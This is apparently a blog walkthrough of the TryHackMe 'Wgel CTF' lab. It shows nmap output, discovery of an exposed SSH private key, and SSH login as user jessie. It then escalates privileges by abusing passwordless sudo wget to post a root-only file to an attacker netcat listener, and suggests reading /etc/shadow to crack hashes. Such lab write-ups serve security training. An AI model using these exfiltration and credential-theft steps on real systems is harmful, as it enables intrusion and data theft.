Welcome to Neehack Blogs

Tryhckme wgelctf walkthrough


Nmap Results:

# Nmap 7.93 scan initiated Tue Nov  1 19:39:24 2022 as: nmap -p- -sC -sV -A -T4 -oA nmap_full -v 10.10.15.120
adjust_timeouts2: packet supposedly had rtt of -92282 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -92282 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -119000 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -119000 microseconds.  Ignoring time.
Nmap scan report for 10.10.15.120
Host is up (0.090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94961b66801b7648682d14b59a01aaaa (RSA)
|   256 18f710cc5f40f6cf92f86916e248f438 (ECDSA)
|_  256 b90b972e459bf32a4b11c7831033e0ce (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=11/1%OT=22%CT=1%CU=36693%PV=Y%DS=4%DC=T%G=Y%TM=6361AE8
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=10A%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=10A%GCD=1%ISR=107%TI=Z%CI=I%TS=A)OPS(O1=M506ST11NW6%O2=M506ST11NW6%O
OS:3=M506NNT11NW6%O4=M506ST11NW6%O5=M506ST11NW6%O6=M506ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=617%O=NNT11%CC=
OS:N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G
OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 12.192 days (since Thu Oct 20 15:04:24 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   22.85 ms 10.6.0.1
2   ... 3
4   89.47 ms 10.10.15.120

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov  1 19:40:48 2022 -- 1 IP address (1 host up) scanned in 83.83 seconds

We can see that port 80 is serving HTTP services. Visiting the home page, we find that apache2 default page which is modified and contains some comments:

wgelctf home page jessie comment

We can see, there is someone called Jessie. It may be a username too.

Running dirbuster against urp http://thm.ip/sitemap/ using /usr/share/wordlists/dirb/common.txt, we see a folder called .ssh

Fast forward, visiting .ssh folder over http, we find an id_rsa private key.

wgelctf id_rsa

So, we download id_rsa to our attacking machine. Set proper permission to the private key file and try it with the username Jessie.

kali$ chmod 600 ./id_rsa
kali$ ssh jessie@thm.ip -i ./id_rsa
wgelctf jessie ssh login

Apparently, the user flag is not in home directory, so, we can run a quick find command to find all the filename containing flag.

kali$ find / -name "*flag*" -type f 2>/dev/null

In a second, we find the flag is under /home/jessie/Documents/user_flag.txt

wgelcft user flag

Time for escalation. Running a quick “sudo -l”, we see that we can execute /usr/bin/wget as sudo without password.

wgelctf jessie sudo -l

Having root access to wget, we can read from a file and output it to a http stream. First, on our attacking machine, we run nc to listen on port 80, and then on the target machine, we can use wget’s –post-file parameter to read the root_flag.txt and output it to the attacking machine’s nc listener.

Attacking Machine:

kali$ nc -lnvp 80 > root_flag.txt
listening on [any] 80 ...

Victim Machine:

jessie@CorpOne:~/$ sudo /usr/bin/wget --post-file=/root/root_flag.txt attacker_ip

You can also read /etc/shadow file and crack jessie’s hash to obtain all sudo access.

Peace


Leave a Reply

Your email address will not be published.